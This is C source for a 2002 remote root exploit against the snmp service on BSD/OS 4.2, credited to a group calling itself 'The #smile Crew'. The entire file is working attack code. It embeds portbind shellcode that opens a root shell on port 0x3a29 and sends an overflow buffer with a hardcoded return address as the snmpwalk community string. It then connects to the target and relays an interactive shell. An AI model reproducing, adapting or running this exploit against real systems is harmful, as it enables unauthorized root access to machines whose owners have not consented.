/*
* 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit
*
* By: Safety and dekadish (Feb 2002)
*
*
* The #smile Crew
*
* Version: 0.1
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
//
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <fcntl.h>
#include <time.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might
want to change it */
#define RETADDR 0x8045834
#define BUFLEN 260
#define NOP 0x90
/* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */
char shellkod[] =
"\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
"\xf7\xd0" // not eax
"\x50" // push eax
"\x31\xc0" // xor eax, eax
"\xb0\x9a" // mov al, 09ah
"\x50" // push eax
"\x89\xe7" // mov edi, esp
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\xb0\x61" // mov al, 97
"\xff\xd7" // call edi
"\x89\xc6" // mov esi, eax
"\x52" // push edx
"\x66\x68\x3a\x29" // push word 4135
"\x66\x53" // push bx
"\x89\xe5" // mov ebp, esp
"\x6a\x10" // push byte 16
"\x55" // push ebp
"\x56" // push esi
"\xb0\x68" // mov al, 104
"\xff\xd7" // call edi
"\xb0\x6a" // mov al, 106
"\xff\xd7" // call edi
"\x52" // push edx
"\x52" // push edx
"\x56" // push esi
"\xb0\x1e" // mov al, 30
"\xff\xd7" // call edi
"\x53" // push ebx
"\x50" // push eax
"\xb0\x5a" // mov al, 90
"\xff\xd7" // call edi
"\x4b" // dec ebx
"\x79\xf7" // jns duploop
"\x50" // push eax
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x54" // push esp
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xff\xd7";
char *buffer;
char fippla(u_long ret);
int connect2shell(char *ip);
int main(int argc, char *argv[])
{
int ret;
pid_t pid;
fprintf(stderr, "%s\n", "[The #smile Crew]");
if (argc != 2)
{
fprintf(stderr, "Usage: %s <IP>\n\n", argv[0]);
exit(-1);
}
fippla(RETADDR);
pid = fork();
if (pid == -1)
{
fprintf(stderr, "fork() failed\n");
exit(-1);
}
if (!pid)
{
if(execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1)
{
fprintf(stderr, "Unable to run snmpwalk (correct path?)\n");
exit(-1);
}
}
else
waitpid(pid, &ret, 0);
connect2shell(argv[1]);
free(buffer);
return;
}
char fippla(u_long ret)
{
int i;
buffer = (char *)malloc(BUFLEN);
for (i = 0; i < 256 ; i++)
*(buffer+i) = NOP;
memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod));
for (i = 0; i < 115;)
{
buffer[i++] = (ret & 0xff);
buffer[i++] = (ret >> 8) & 0xff;
buffer[i++] = (ret >> 16) & 0xff;
buffer[i++] = (ret >> 24) & 0xff;
}
return(1);
}
int connect2shell(char *ip)
{
char *buf;
fd_set fds;
int s, n, ret;
struct sockaddr_in sock;
sock.sin_family = AF_INET;
sock.sin_port = htons(0x3a29);
sock.sin_addr.s_addr = inet_addr(ip);
s = socket(AF_INET, SOCK_STREAM, 0);
ret = connect(s, (struct sockaddr *)&sock, sizeof(sock));
if (ret)
{
printf("Exploit failed\n");
exit(0);
}
else
printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n");
dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n");
buf = (char *)malloc(512);
memset(buf, 0, 512);
while (1)
{
FD_SET(0, &fds);
FD_SET(s, &fds);
select((s+1), &fds, 0, 0, 0);
if (FD_ISSET(0, &fds))
{
n = read(0, buf, 511);
if (n < 1)
{
fprintf(stderr, "read() error\n");
exit(-1);
}
write(s, buf, n);
}
if (FD_ISSET(s, &fds))
{
n = read(s, buf, 511);
if (n < 0)
{
fprintf(stderr, "read() error\n");
exit(-1);
}
else if (!n)
{
printf("Disconnected\n");
exit(0);
}
write(1, buf, n);
}
}
free(buf);
return;
}